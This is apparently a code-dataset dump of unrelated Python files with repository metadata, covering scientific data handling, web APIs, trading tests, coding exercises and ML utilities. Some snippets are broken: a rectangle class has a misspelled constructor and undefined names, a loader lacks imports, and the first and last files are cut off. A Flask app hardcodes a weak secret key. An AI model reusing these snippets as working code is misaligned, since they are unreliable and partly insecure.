# fake events. mantid cannot handle empty events
bevts = events[0:1].copy()
evt = bevts[0]
evt['pixelID'] = pixelidstart
evt['tofChannelNo'] = 0
evt['p'] = 0
# bank events directory
be = entry['bank%s_events' % (bank+bank_id_offset)]
be['event_id'] = bevts['pixelID'] + pixel_id_offset
be['event_time_offset'] = np.array(bevts['tofChannelNo'], dtype='float32') * tofbinsize
be['event_time_offset'].attrs['units'] = np.string_('microsecond')
be['event_weight'] = np.array(bevts['p'], dtype='float32')
be['event_index'] = np.array([0, len(bevts)], dtype='uint64')
be['event_time_zero'] = np.array([0, 1./60], dtype='float64')
etz = be['event_time_zero']
# hack
etz_attrs['target'] = np.string_('/entry/instrument/bank%s/event_time_zero' % (bank+bank_id_offset))
for k,v in etz_attrs.items(): etz.attrs[k] = v
# XXX: should this be a float and the sum of all weights?
# XXX: michael reuter said this is not really used
be['total_counts'][0] = len(bevts)
# bank directory
b = entry['bank%s' % (bank+bank_id_offset)]
# XXX: should this be float array?
# XXX: michael reuter said this is not really used
# compute histogram
# h, edges = np.histogram(bevts['pixelID'], pixelsperbank, range=(pixelidstart-0.5, pixelidend-0.5)) # weights = ?
# h.shape = 8, 128
# b['data_x_y'][:] = np.array(h, dtype='uint32')
continue
# XXX: should it be a float?
# entry['total_counts'][0] = len(events)
#
f.close()
#
sys.stdout.write('\n')
return
bank_id_offset = 1
pixelsperbank = 8 * 128
pixel_id_offset = (bank_id_offset-1)*pixelsperbank
nbanks = 50
npixels = nbanks * pixelsperbank
import os
from mcvine import resources as res
nxs_template = os.path.join(
res.instrument('CNCS'), 'nxs',
'cncs-raw-events-template.nxs',
)
import numpy as np
# End of file
|
[
"[email protected]"
] | |
6e7957bb1f333a3da864d18a81ae420ab74e4ffa
|
f19c5436c7173835a3f1d064541ee742178e213a
|
/mah/Programmers/메뉴 리뉴얼.py
|
20b5a552218aadd52b2828f25d2f9f8a092c26d5
|
[] |
no_license
|
hongsungheejin/Algo-Study
|
f1c521d01147a6f74320dbc8efe3c1037e970e73
|
d6cb8a2cc6495ccfcfb3477330a3af95895fae32
|
refs/heads/main
| 2023-07-06T10:58:27.258128 | 2021-07-29T02:11:13 | 2021-07-29T02:11:13 | 379,269,918 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 914 |
py
|
from itertools import combinations
def solution(orders, course):
candi = {}
course = set(course)
for order in orders:
order = sorted(order)
for i in range(2, len(order)+1):
for combi in combinations(order, i):
combi = "".join(combi)
if combi in candi:
candi[combi] += 1
else:
candi[combi] = 1
answer = []
candis = {k:v for k, v in sorted(candi.items(), key=lambda x: (len(x[0]), x[1])) if v>=2}
for c in course:
tmp = {}
max_v = 0
for k, v in sorted(candis.items(), key=lambda x:x[0]):
if len(k) == c:
max_v = max(max_v, v)
if v in tmp: tmp[v].append(k)
else: tmp[v] = [k]
if max_v in tmp:
answer.extend(tmp[max_v])
return sorted(answer)
|
[
"[email protected]"
] | |
f607cc5e2526bcc268de801f40a60c5f8d777c39
|
558ad954a7b150ce95a30e5b1b4d277ed8286d46
|
/0x04-python-more_data_structures/8-simple_delete.py
|
48e0c39dd411cfe4884cd6a191de83073610e039
|
[] |
no_license
|
Indifestus/holbertonschool-higher_level_programming
|
9cf41f53d164a6612ea982c28468d2a330212920
|
aaaa08577888828016557826f85a98893d8e9cca
|
refs/heads/master
| 2023-03-15T19:06:48.626734 | 2018-01-15T02:27:29 | 2018-01-15T02:27:29 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 135 |
py
|
#!/usr/bin/python3
def simple_delete(my_dict, key=""):
if my_dict is not None:
my_dict.pop(key, None)
return my_dict
|
[
"[email protected]"
] | |
77921aade12cd93cfbbbffb1e59a7444b7ad84c1
|
d0d088be9ba855fbc1798d55a0874faee192d8b5
|
/posthog/api/person.py
|
e1d035c0bd7b0f564145380d16c7e281ae576d71
|
[
"MIT"
] |
permissive
|
pplonski/posthog
|
bf62d1bfb36a007adb180faecd418a8d1337f904
|
9ae6854254085bbe10cc4f9c98820d9efed52424
|
refs/heads/master
| 2021-01-08T17:36:18.303885 | 2020-02-20T19:38:07 | 2020-02-20T19:38:07 | 242,096,368 | 2 | 0 |
MIT
| 2020-02-21T09:00:14 | 2020-02-21T09:00:14 | null |
UTF-8
|
Python
| false | false | 2,781 |
py
|
from posthog.models import Event, Team, Person, PersonDistinctId
from rest_framework import serializers, viewsets, response, request
from rest_framework.decorators import action
from django.db.models import Q, Prefetch, QuerySet, Subquery, OuterRef
from .event import EventSerializer
from typing import Union
from .base import CursorPagination
class PersonSerializer(serializers.HyperlinkedModelSerializer):
last_event = serializers.SerializerMethodField()
name = serializers.SerializerMethodField()
class Meta:
model = Person
fields = ['id', 'name', 'distinct_ids', 'properties', 'last_event', 'created_at']
def get_last_event(self, person: Person) -> Union[dict, None]:
if not self.context['request'].GET.get('include_last_event'):
return None
last_event = Event.objects.filter(team_id=person.team_id, distinct_id__in=person.distinct_ids).order_by('-timestamp').first()
if last_event:
return {'timestamp': last_event.timestamp}
else:
return None
def get_name(self, person: Person) -> str:
if person.properties.get('email'):
return person.properties['email']
if len(person.distinct_ids) > 0:
return person.distinct_ids[-1]
return person.pk
class PersonViewSet(viewsets.ModelViewSet):
queryset = Person.objects.all()
serializer_class = PersonSerializer
pagination_class = CursorPagination
def _filter_request(self, request: request.Request, queryset: QuerySet) -> QuerySet:
if request.GET.get('id'):
people = request.GET['id'].split(',')
queryset = queryset.filter(id__in=people)
if request.GET.get('search'):
parts = request.GET['search'].split(' ')
contains = []
for part in parts:
if ':' in part:
queryset = queryset.filter(properties__has_key=part.split(':')[1])
else:
contains.append(part)
queryset = queryset.filter(properties__icontains=' '.join(contains))
queryset = queryset.prefetch_related(Prefetch('persondistinctid_set', to_attr='distinct_ids_cache'))
return queryset
def get_queryset(self):
queryset = super().get_queryset()
team = self.request.user.team_set.get()
queryset = queryset.filter(team=team)
queryset = self._filter_request(self.request, queryset)
return queryset.order_by('-id')
@action(methods=['GET'], detail=False)
def by_distinct_id(self, request):
person = self.get_queryset().get(persondistinctid__distinct_id=str(request.GET['distinct_id']))
return response.Response(PersonSerializer(person, context={'request': request}).data)
|
[
"[email protected]"
] | |
67036aa7f5e73b06e2cc28232521344169dd679e
|
5006a6965c21e5b828300eedf907eb55ec5b8b27
|
/bnpy/callbacks/CBCalcHeldoutMetricsTopicModel.py
|
57f0d662cfa836d5634ada5bdb6b7f599e3c9e2c
|
[
"BSD-3-Clause"
] |
permissive
|
birlrobotics/bnpy
|
1804d0fed9c3db4c270f4cd6616b30323326f1ec
|
8f297d8f3e4a56088d7755134c329f63a550be9e
|
refs/heads/master
| 2021-07-09T14:36:31.203450 | 2018-02-09T07:16:41 | 2018-02-09T07:16:41 | 96,383,050 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,802 |
py
|
'''
CBCalcHeldoutMetricsTopicModel.py
Learning alg callback extension for fitting topic models on heldout data.
When applied, will perform heldout inference at every parameter-save checkpoint.
Usage
--------
Add the following keyword arg to any call to bnpy.run
--customFuncPath CBCalcHeldoutMetricsTopicModel.py
Example
-------
$ python -m bnpy.Run BarsK10V900 FiniteTopicModel Mult VB \
--K 10 --nLap 50 \
--saveEvery 10 \
--customFuncPath CBCalcHeldoutMetricsTopicModel
Notes
--------
Uses the custom-function interface for learning algorithms.
This interface means that the functions onAlgorithmComplete and onBatchComplete
defined here will be called at appropriate time in *every* learning algorithm.
See LearnAlg.py's eval_custom_function for details.
'''
from __future__ import print_function
import os
import numpy as np
import scipy.io
import InferHeldoutTopics
import HeldoutMetricsLogger
SavedLapSet = set()
def onAlgorithmComplete(**kwargs):
''' Runs at completion of the learning algorithm.
Keyword Args
--------T
All workspace variables passed along from learning alg.
'''
if kwargs['lapFrac'] not in SavedLapSet:
runHeldoutCallback(**kwargs)
def onBatchComplete(**kwargs):
''' Runs viterbi whenever a parameter-saving checkpoint is reached.
Keyword Args
--------
All workspace variables passed along from learning alg.
'''
global SavedLapSet
if kwargs['isInitial']:
SavedLapSet = set()
HeldoutMetricsLogger.configure(
**kwargs['learnAlg'].BNPYRunKwArgs['OutputPrefs'])
if not kwargs['learnAlg'].isSaveParamsCheckpoint(kwargs['lapFrac'],
kwargs['iterid']):
return
if kwargs['lapFrac'] in SavedLapSet:
return
SavedLapSet.add(kwargs['lapFrac'])
runHeldoutCallback(**kwargs)
def runHeldoutCallback(**kwargs):
''' Run heldout metrics evaluation on test dataset.
Kwargs will contain all workspace vars passed from the learning alg.
Keyword Args
------------
hmodel : current HModel object
Data : current Data object
representing *entire* dataset (not just one chunk)
Returns
-------
None. MAP state sequences are saved to a MAT file.
Output
-------
MATfile format: Lap0020.000MAPStateSeqs.mat
'''
taskpath = kwargs['learnAlg'].savedir
for splitName in ['validation', 'test']:
elapsedTime = kwargs['learnAlg'].get_elapsed_time()
InferHeldoutTopics.evalTopicModelOnTestDataFromTaskpath(
dataSplitName=splitName,
taskpath=taskpath,
elapsedTime=elapsedTime,
queryLap=kwargs['lapFrac'],
printFunc=HeldoutMetricsLogger.pprint,
**kwargs)
|
[
"[email protected]"
] | |
6eda11f72415c2c9a36b7f5635e2560ef63bf01a
|
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
|
/sdBs/AllRun/pg_1318+062/sdB_pg_1318+062_lc.py
|
ff49a4e872dad3cb97afe62d31f086a25e90d3e8
|
[] |
no_license
|
tboudreaux/SummerSTScICode
|
73b2e5839b10c0bf733808f4316d34be91c5a3bd
|
4dd1ffbb09e0a599257d21872f9d62b5420028b0
|
refs/heads/master
| 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 344 |
py
|
from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[200.185083,5.983667], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_pg_1318+062/sdB_pg_1318+062_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
053950d8dee6b200c63e069154c6d9c6ba7b21af
|
02442f7d3bd75da1b5b1bf6b981cc227906a058c
|
/rocon/build/rocon_app_platform/rocon_app_manager/catkin_generated/pkg.develspace.context.pc.py
|
3de9876b63c7300094cd88e5c7d2b10e59c73d88
|
[] |
no_license
|
facaisdu/RaspRobot
|
b4ff7cee05c70ef849ea4ee946b1995432a376b7
|
e7dd2393cdabe60d08a202aa103f796ec5cd2158
|
refs/heads/master
| 2020-03-20T09:09:28.274814 | 2018-06-14T08:51:46 | 2018-06-14T08:51:46 | 137,329,761 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 393 |
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "rocon_app_manager"
PROJECT_SPACE_DIR = "/home/sclab_robot/turtlebot_ws/rocon/devel"
PROJECT_VERSION = "0.8.0"
|
[
"[email protected]"
] | |
5c9f9ce0e28a0947dd8edbcea57820ca55c76184
|
d3efc82dfa61fb82e47c82d52c838b38b076084c
|
/Autocase_Result/KCB_YCHF/KCB_YCHF_MM/SHOffer/YCHF_KCBYCHF_SHBP_153.py
|
57c5b458804546c0a77bf642879eaa200c682c30
|
[] |
no_license
|
nantongzyg/xtp_test
|
58ce9f328f62a3ea5904e6ed907a169ef2df9258
|
ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f
|
refs/heads/master
| 2022-11-30T08:57:45.345460 | 2020-07-30T01:43:30 | 2020-07-30T01:43:30 | 280,388,441 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,568 |
py
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test//xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test//service")
from ServiceConfig import *
from ARmainservice import *
from QueryStkPriceQty import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test//mysql")
from CaseParmInsertMysql import *
from SqlData_Transfer import *
sys.path.append("/home/yhl2/workspace/xtp_test//utils")
from QueryOrderErrorMsg import queryOrderErrorMsg
from env_restart import *
class YCHF_KCBYCHF_SHBP_153(xtp_test_case):
def setUp(self):
#sql_transfer = SqlData_Transfer()
#sql_transfer.transfer_fund_asset('YCHF_KCBYCHF_SHBP_153')
#clear_data_and_restart_all()
#Api.trade.Logout()
#Api.trade.Login()
pass
#
def test_YCHF_KCBYCHF_SHBP_153(self):
title = '重启上海报盘(沪A最优五档即成转限价:分笔成交_累积成交金额 >= 手续费 且手续费小于最小值)'
# 定义当前测试用例的期待值
# 期望状态:初始、未成交、部成、全成、部撤已报、部撤、已报待撤、已撤、废单、撤废、内部撤单
# xtp_ID和cancel_xtpID默认为0,不需要变动
case_goal = {
'期望状态': '全成',
'errorID': 0,
'errorMSG': queryOrderErrorMsg(0),
'是否生成报单': '是',
'是否是撤废': '否',
# '是否是新股申购': '',
'xtp_ID': 0,
'cancel_xtpID': 0,
}
logger.warning(title)
# 定义委托参数信息------------------------------------------
# 参数:证券代码、市场、证券类型、证券状态、交易状态、买卖方向(B买S卖)、期望状态、Api
stkparm = QueryStkPriceQty('688011', '1', '4', '2', '0', 'S', case_goal['期望状态'], Api)
# 如果下单参数获取失败,则用例失败
if stkparm['返回结果'] is False:
rs = {
'报单测试结果': stkparm['返回结果'],
'测试错误原因': '获取下单参数失败,' + stkparm['错误原因'],
}
print(stkparm['错误原因'])
self.assertEqual(rs['报单测试结果'], True)
else:
wt_reqs = {
'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_CASH'],
'order_client_id':5,
'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SH_A'],
'ticker': stkparm['证券代码'],
'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_SELL'],
'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_BEST5_OR_LIMIT'],
'price': stkparm['涨停价'],
'quantity': 300,
'position_effect':Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
}
rs = serviceTest(Api, case_goal, wt_reqs)
logger.warning('执行结果为' + str(rs['报单测试结果']) + ','
+ str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
## 还原可用资金
#sql_transfer = SqlData_Transfer()
#sql_transfer.transfer_fund_asset('YW_KCB_BAK_000')
#oms_restart()
self.assertEqual(rs['报单测试结果'], True) # 211
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
34d788e9ab997f619139b8af4b45a786cee0aac0
|
ce27a376fa4f6a25008674d007c670a4a0b8bda7
|
/defects_thresholding.py
|
1c96261ba4ebe8222fcc90b839c16ced1c0d9cfa
|
[] |
no_license
|
jrr1984/defects_analysis
|
22139b7734478b6261cf9efeaae755a2c5c71c79
|
2e43b65f1b936516f4a4c8f7feb5d46468864957
|
refs/heads/master
| 2020-12-10T20:00:39.977833 | 2020-04-16T12:00:22 | 2020-04-16T12:00:22 | 233,694,615 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,701 |
py
|
from skimage.filters import threshold_yen,threshold_isodata
from skimage import io,measure,img_as_float,morphology
from skimage.measure import regionprops_table
from skimage.color import label2rgb
import numpy as np
from scipy import ndimage
import matplotlib.pyplot as plt
from matplotlib_scalebar.scalebar import ScaleBar
import pandas as pd
import glob
import time
start_time = time.time()
pixels_to_microns = 0.586
proplist = ['equivalent_diameter','area']
path = "C:/Users/juanr/Documents/mediciones_ZEISS/TILING/NIR/norm/*.tif"
data= []
holes_data = []
i=0
for file in glob.glob(path):
img = io.imread(file)
img = img_as_float(img)
thresh = threshold_yen(img)
binary = img <= thresh
binary_var = img <= (thresh - 0.1*thresh)
masked_binary = ndimage.binary_fill_holes(binary)
masked_binary_var = ndimage.binary_fill_holes(binary_var)
hols = masked_binary.astype(int) - binary
hols_var = masked_binary_var.astype(int) - binary_var
lab = measure.label(hols,connectivity=2)
lab_var = measure.label(hols_var, connectivity=2)
cleaned_holes = morphology.remove_small_objects(lab, connectivity=2)
cleaned_holes_var = morphology.remove_small_objects(lab_var, connectivity=2)
label_image = measure.label(masked_binary,connectivity=2)
label_image_var = measure.label(masked_binary_var, connectivity=2)
label_final = morphology.remove_small_objects(label_image, min_size=15)
label_final_var = morphology.remove_small_objects(label_image_var, min_size=15)
if label_final.any()!=0 and label_final_var.any() !=0:
props = regionprops_table(label_final, intensity_image=img, properties=proplist)
props_var = regionprops_table(label_final_var, intensity_image=img, properties=proplist)
props_df = pd.DataFrame(props)
props_df_var = pd.DataFrame(props_var)
props_df['error_diameter'] = abs(round((props_df['equivalent_diameter'] - props_df_var['equivalent_diameter'])*pixels_to_microns))
props_df['error_area'] = abs(round((props_df['area'] - props_df_var['area']) * pixels_to_microns ** 2))
props_df['img'] = i
data.append(props_df)
print('defects_df')
print(props_df)
print('error')
print(props_df['error_diameter'])
if cleaned_holes.any()!= 0 and cleaned_holes_var.any() != 0:
props_holes = regionprops_table(cleaned_holes, intensity_image=img, properties=proplist)
props_holes_var = regionprops_table(cleaned_holes_var, intensity_image=img, properties=proplist)
holes_df = pd.DataFrame(props_holes)
holes_df_var = pd.DataFrame(props_holes_var)
holes_df['error_diameter'] = abs(round((holes_df['equivalent_diameter'] - holes_df_var['equivalent_diameter'])*pixels_to_microns))
holes_df['error_area'] = abs(round((holes_df['area'] - holes_df_var['area']) * pixels_to_microns**2))
holes_df['img'] = i
holes_data.append(holes_df)
print('holes_df')
print(holes_df)
print('error holes')
print(holes_df['error_diameter'])
print(file, i)
i += 1
df = pd.concat(data)
df['equivalent_diameter'] = round(df['equivalent_diameter'] * pixels_to_microns)
df['area'] = round(df['area'] * pixels_to_microns **2)
df.to_pickle("C:/Users/juanr/Documents/data_mediciones/defects/defectsNIR_df.pkl")
holes_df = pd.concat(holes_data)
holes_df['equivalent_diameter'] = round(holes_df['equivalent_diameter'] * pixels_to_microns)
holes_df['area'] = round(holes_df['area'] * pixels_to_microns **2)
holes_df.to_pickle("C:/Users/juanr/Documents/data_mediciones/defects/defectsholesNIR_df.pkl")
print("--- %s minutes ---" % ((time.time() - start_time)/60))
|
[
"[email protected]"
] | |
bb53fe452117f99a8d8f7b1e33f47e1ab79db0c2
|
77b16dcd465b497c22cf3c096fa5c7d887d9b0c2
|
/Cron_Philip/Assignments/flaskolympics/olympics3/server.py
|
3c8cc483f0488a3e80700542e08036210ca2f614
|
[
"MIT"
] |
permissive
|
curest0x1021/Python-Django-Web
|
a7cf8a45e0b924ce23791c18f6a6fb3732c36322
|
6264bc4c90ef1432ba0902c76b567cf3caaae221
|
refs/heads/master
| 2020-04-26T17:14:20.277967 | 2016-10-18T21:54:39 | 2016-10-18T21:54:39 | 173,706,702 | 6 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 322 |
py
|
from flask import Flask, render_template, session
app = Flask(__name__)
app.secret_key = 'ThisIsSecret'
@app.route('/')
def myfirstfunction():
if not 'title' in session:
session['title'] = 'hello world'
return render_template('index.html', name="Mike")
if __name__ == '__main__':
app.run(debug = True)
|
[
"[email protected]"
] | |
2bcd1788de6e9a593abedae6ed61b48c43c67654
|
06d6c9346331e392f6d8067eb9ee52d38ae5fab8
|
/carver/pe/setup.py
|
299b8bff264703b5031d4a1ddd6b11e7c4e69e92
|
[
"Apache-2.0"
] |
permissive
|
maydewd/stoq-plugins-public
|
5d5e824dda0c78acab4ff9aef72f567e6b85e555
|
8b2877b5091ae731437ef35a95d4debdbf0a19f3
|
refs/heads/master
| 2020-03-22T18:57:41.061748 | 2018-06-12T14:36:42 | 2018-06-12T14:36:42 | 140,494,475 | 0 | 0 |
Apache-2.0
| 2018-07-10T22:39:08 | 2018-07-10T22:39:08 | null |
UTF-8
|
Python
| false | false | 371 |
py
|
from setuptools import setup, find_packages
setup(
name="pe",
version="0.10",
author="Jeff Ito, Marcus LaFerrera (@mlaferrera)",
url="https://github.com/PUNCH-Cyber/stoq-plugins-public",
license="Apache License 2.0",
description="Carve portable executable files from a data stream",
packages=find_packages(),
include_package_data=True,
)
|
[
"[email protected]"
] | |
ab523c3751accac0cb2820f8f76621d3ca5474ab
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_172/ch88_2020_05_06_12_07_01_120079.py
|
65c8bdbe203ac21abf9a6631e62483803e27d184
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 344 |
py
|
class Retangulo:
def _init_(self,coord1, coord2):
coord1 = Ponto(x1, y1)
coord2 = Ponto(x2, y2)
def calcula_perimetro(self):
base = x2 - x1
altura = y2 - y1
p = 2*base + 2*altura
def calcula_area(self):
base = x2 - x1
altura = y2 - y1
a = base*altura
|
[
"[email protected]"
] | |
998e74d73408d3c5bf3bf99ce5df17a7a52ee3f8
|
0a40a0d63c8fce17f4a686e69073a4b18657b160
|
/test/functional/rpc_bip38.py
|
b70349a25ed83fb3fc00d631b1bc8dcd9eb3f3e4
|
[
"MIT"
] |
permissive
|
MotoAcidic/Cerebellum
|
23f1b8bd4f2170c1ed930eafb3f2dfff07df1c24
|
6aec42007c5b59069048b27db5a8ea1a31ae4085
|
refs/heads/main
| 2023-05-13T06:31:23.481786 | 2021-06-09T15:28:28 | 2021-06-09T15:28:28 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,025 |
py
|
#!/usr/bin/env python3
# Copyright (c) 2018-2019 The CEREBELLUM developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test RPC commands for BIP38 encrypting and decrypting addresses."""
from test_framework.test_framework import CerebellumTestFramework
from test_framework.util import assert_equal
class Bip38Test(CerebellumTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
def run_test(self):
password = 'test'
address = self.nodes[0].getnewaddress()
privkey = self.nodes[0].dumpprivkey(address)
self.log.info('encrypt address %s' % (address))
bip38key = self.nodes[0].bip38encrypt(address, password)['Encrypted Key']
self.log.info('decrypt bip38 key %s' % (bip38key))
assert_equal(self.nodes[1].bip38decrypt(bip38key, password)['Address'], address)
if __name__ == '__main__':
Bip38Test().main()
|
[
"[email protected]"
] | |
fe57a510beaf39e45c60b51b452a5c31026ab28d
|
3ecce3646d66033d214db3749be63e78d4f663e9
|
/Assignment 4/load_utils.py
|
9b4f3fc6a5fb3ab71f6dc4b5ce5cbba2fb817a22
|
[
"Apache-2.0"
] |
permissive
|
pradyumnakr/EIP-3.0
|
f36aaed042d65beef163b08dbb0de05139e3fee7
|
67bc5168b169406d7567f3d1d3b9b35fc7dd61af
|
refs/heads/master
| 2022-01-27T15:23:00.013031 | 2019-07-28T17:25:35 | 2019-07-28T17:25:35 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,699 |
py
|
def load_tiny_imagenet(path, dtype=np.float32, subtract_mean=True):
# First load wnids
with open(os.path.join(path, 'wnids.txt'), 'r') as f:
wnids = [x.strip() for x in f]
# Map wnids to integer labels
wnid_to_label = {wnid: i for i, wnid in enumerate(wnids)}
# Use words.txt to get names for each class
with open(os.path.join(path, 'words.txt'), 'r') as f:
wnid_to_words = dict(line.split('\t') for line in f)
for wnid, words in wnid_to_words.items():
wnid_to_words[wnid] = [w.strip() for w in words.split(',')]
class_names = [wnid_to_words[wnid] for wnid in wnids]
# Next load training data.
X_train = []
y_train = []
for i, wnid in enumerate(wnids):
if (i + 1) % 20 == 0:
print(f'loading training data for synset {(i + 1)}/{len(wnids)}')
# To figure out the filenames we need to open the boxes file
boxes_file = os.path.join(path, 'train', wnid, '%s_boxes.txt' % wnid)
with open(boxes_file, 'r') as f:
filenames = [x.split('\t')[0] for x in f]
num_images = len(filenames)
X_train_block = np.zeros((num_images, 64, 64, 3), dtype=dtype)
y_train_block = wnid_to_label[wnid] * np.ones(num_images, dtype=np.int64)
for j, img_file in enumerate(filenames):
img_file = os.path.join(path, 'train', wnid, 'images', img_file)
img = imread(img_file)
if img.ndim == 2:
## grayscale file
img.shape = (64, 64, 1)
X_train_block[j] = img.transpose(1, 0, 2)
X_train.append(X_train_block)
y_train.append(y_train_block)
# We need to concatenate all training data
X_train = np.concatenate(X_train, axis=0)
y_train = np.concatenate(y_train, axis=0)
# Next load validation data
with open(os.path.join(path, 'val', 'val_annotations.txt'), 'r') as f:
img_files = []
val_wnids = []
for line in f:
img_file, wnid = line.split('\t')[:2]
img_files.append(img_file)
val_wnids.append(wnid)
num_val = len(img_files)
y_val = np.array([wnid_to_label[wnid] for wnid in val_wnids])
X_val = np.zeros((num_val, 64, 64, 3), dtype=dtype)
for i, img_file in enumerate(img_files):
img_file = os.path.join(path, 'val', 'images', img_file)
img = imread(img_file)
if img.ndim == 2:
img.shape = (64, 64, 1)
X_val[i] = img.transpose(1, 0, 2)
# Next load test images
# Students won't have test labels, so we need to iterate over files in the
# images directory.
img_files = os.listdir(os.path.join(path, 'test', 'images'))
X_test = np.zeros((len(img_files), 64, 64, 3), dtype=dtype)
for i, img_file in enumerate(img_files):
img_file = os.path.join(path, 'test', 'images', img_file)
img = imread(img_file)
if img.ndim == 2:
img.shape = (64, 64, 1)
X_test[i] = img.transpose(1, 0, 2)
y_test = None
y_test_file = os.path.join(path, 'test', 'test_annotations.txt')
if os.path.isfile(y_test_file):
with open(y_test_file, 'r') as f:
img_file_to_wnid = {}
for line in f:
line = line.split('\t')
img_file_to_wnid[line[0]] = line[1]
y_test = [wnid_to_label[img_file_to_wnid[img_file]] for img_file in img_files]
y_test = np.array(y_test)
mean_image = X_train.mean(axis=0)
if subtract_mean:
X_train -= mean_image[None]
X_val -= mean_image[None]
X_test -= mean_image[None]
return {
'class_names': class_names,
'X_train': X_train,
'y_train': y_train,
'X_val': X_val,
'y_val': y_val,
'X_test': X_test,
'y_test': y_test,
'class_names': class_names,
'mean_image': mean_image,
}
data = load_tiny_imagenet('/content/tiny-imagenet-200/', dtype=np.float32, subtract_mean=True)
|
[
"[email protected]"
] | |
09c006664cf108d6ae9fc0f41fcb8e22fcea4877
|
a9e60d0e5b3b5062a81da96be2d9c748a96ffca7
|
/configurations/i21-config/scripts/functions/sample_vessel_vacuum_control.py
|
055be6350f0c567e280cfe42194b79f557165ef8
|
[] |
no_license
|
openGDA/gda-diamond
|
3736718596f47607335ada470d06148d7b57526e
|
bbb64dcfd581c30eddb210c647db5b5864b59166
|
refs/heads/master
| 2023-08-16T08:01:11.075927 | 2023-08-15T16:01:52 | 2023-08-15T16:01:52 | 121,757,699 | 4 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,543 |
py
|
'''
define function to control the sample vessel vacuum valves for sample changes
Created on 18 Jul 2023
@author: fy65
'''
import installation
from gda.device.scannable import ScannableMotionBase
from gda.epics import CAClient
# control PV = BL21I-EA-SMPL-01:SEQ:CTRL
# state PV = BL21I-EA-SMPL-01:SEQ:CTRL:STATE_RBV
class SampleVesselValvesControl(ScannableMotionBase):
def __init__(self, name, pv):
self.setName(name)
self.setInputNames([name])
self.setOutputFormat(["%d"])
self.control = CAClient(pv)
self.state = CAClient(pv + ":STATE_RBV")
self.control.configure()
self.state.configure()
self.val = 0
def getPosition(self):
if installation.isLive():
return int(self.control.get()) #0 - Close, 1 - Open
if installation.isDummy():
return self.val
def asynchronousMoveTo(self, val):
if installation.isLive():
self.control.caput(int(val))
if installation.isDummy():
self.val = val
if val == 1:
print("Open sample vessel valves")
if val == 0:
print("Close sample vessel valves")
def isBusy(self):
if installation.isLive():
return int(self.state.caget()) != 2 #2 - Ready, 1 - Opening, 0 - Closing
if installation.isDummy():
return False
sample_vessel_valves = SampleVesselValvesControl("sample_vessel_valves", "BL21I-EA-SMPL-01:SEQ:CTRL")
|
[
"[email protected]"
] | |
2f9db9f890c9233e5af1669088468a7683d1af35
|
0fb3b73f8e6bb9e931afe4dcfd5cdf4ba888d664
|
/awssam/fullfeblog/blog/migrations/0002_auto_20201208_1414.py
|
b61387acb7dcbe792fb0d7d8887e97d528f46789
|
[] |
no_license
|
mrpal39/ev_code
|
6c56b1a4412503604260b3346a04ef53a2ba8bf2
|
ffa0cf482fa8604b2121957b7b1d68ba63b89522
|
refs/heads/master
| 2023-03-24T03:43:56.778039 | 2021-03-08T17:48:39 | 2021-03-08T17:48:39 | 345,743,264 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,023 |
py
|
# Generated by Django 3.1.4 on 2020-12-08 14:14
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('blog', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='post',
options={'ordering': ('-publish',)},
),
migrations.RenameField(
model_name='post',
old_name='content',
new_name='body',
),
migrations.RenameField(
model_name='post',
old_name='date_posted',
new_name='publish',
),
migrations.AddField(
model_name='post',
name='created',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='post',
